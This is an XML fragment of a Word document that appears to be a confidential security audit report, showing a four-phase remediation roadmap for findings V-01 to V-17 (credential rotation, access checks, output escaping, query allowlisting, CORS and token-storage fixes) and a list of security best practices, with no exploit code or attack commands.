            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Today — 24 Hours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V-03: Remove hardcoded credentials from Login.jsx and rotate all three listed accounts immediately</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-01: Require authentication + manage_users permission on /api/auth/register; assign role server-side</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-06: Remove --no-sandbox from all three Puppeteer launchers; configure non-root process user</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-05: Add escapeHtml() to every user-data interpolation in pdfGeneratorNew.js, statisticsPdfGenerator.js, entitiesPdfGenerator.js</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-08: Rotate JWT_SECRET to cryptographically random 64-byte value; reduce JWT_EXPIRES_IN to 15m</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C0550A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase 2 — High Priority (Within 1 Week)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2560"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="C0550A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1–7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V-02: Add entity ownership checks to GET /assessments/:id and GET /exports/pdf/:assessmentId</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-07: Fix CORS callback — reject disallowed origins with cb(new Error(), false)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-09: Migrate token storage from localStorage to httpOnly Secure SameSite=Strict cookies</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-10: Install express-rate-limit — 5 attempts/15 min per IP on login and register endpoints</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-11: Restrict assessment review endpoint to ['super_admin','ministry_admin'] with hierarchy check</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-12: Apply entity-ownership checks to GET /entities/:id, /:id/dashboard, /:id/children</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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase 3 — Medium Priority (Within 1 Month)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2560"/>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vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1–4 Weeks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V-04: Implement ORDER BY column allowlist and parameterize INTERVAL in auditLog.js</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-13: Enforce 12-character password policy with complexity on auth.js and users.js</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-14: Install Helmet.js — configure CSP, HSTS, X-Frame-Options, X-Content-Type-Options</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-15: Set sourcemap: false in vite.config.js for production builds</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-16: Replace console.log with structured logger (Pino); suppress SQL text in production</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">V-17: Remove stack traces from error responses; set NODE_ENV=production in deployment configs</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6B35" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Phase 4 — Security Hardening (Ongoing)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2560"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="1A6B35" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="right"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Continuous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Implement CSRF tokens (csrf-csrf package) for all state-changing API endpoints</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Enable PostgreSQL Row-Level Security (RLS) as a database-enforcement backstop</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Run npm audit in CI/CD pipeline — fail builds on high/critical CVEs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Integrate SAST scanning (Semgrep, ESLint security plugins) into code review workflow</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Conduct third-party penetration test before production deployment and annually thereafter</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement centralized secrets management (HashiCorp Vault or cloud KMS) for credentials</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">5.  SECURITY BEST PRACTICES &amp; ARCHITECTURE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Authentication &amp; Session Management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D"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Use short-lived JWT access tokens (15 min) with rotating refresh tokens in httpOnly cookies</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement multi-factor authentication (TOTP/FIDO2) for all admin and ministry_admin roles</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Add account lockout after 5 failed attempts with exponential backoff and email notification</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Consider OAuth 2.0 / OpenID Connect integration with a hardened identity provider</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Never embed permissions in JWTs — always re-query the database on each request</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API Security &amp; Input Validation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D"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Validate all inputs using Zod, Joi, or express-validator schemas on every endpoint</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Use parameterized queries exclusively — never interpolate user data into SQL strings</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Apply authentication and authorization middleware to every route without exception</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Add API versioning (/api/v1/) to support deprecation of insecure endpoints</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement request size limits appropriate to each endpoint (not one 10MB global limit)</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Infrastructure &amp; Deployment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D"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Run all services as dedicated non-root users in containers with minimal Linux capabilities</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Isolate the Puppeteer/PDF service in a separate container with no direct database access</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Use environment-specific .env files — inject secrets via environment variables or Vault</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Enable PostgreSQL row-level security (RLS) as a database-level enforcement backstop</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Deploy a Web Application Firewall (WAF) in front of the API to filter malicious traffic</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DevSecOps &amp; Code Quality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D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Integrate SAST (Semgrep) in CI/CD — fail the pipeline on any critical security finding</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Run npm audit automatically; treat high/critical CVEs as build-blocking failures</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Implement automated DAST (OWASP ZAP) against staging environments before each release</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Require security-focused code review for all authentication, authorization, and data-access changes</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="3"/>
              </w:numPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Conduct annual penetration tests by a certified third party and track remediation closure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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300"/>
              <w:bottom w:type="dxa" w:w="300"/>
              <w:right w:type="dxa" w:w="300"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF6B6B"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">CLASSIFICATION: CONFIDENTIAL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="100"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="AACCEE"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">This report contains sensitive security vulnerabilities. Handle on a strict need-to-know basis.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
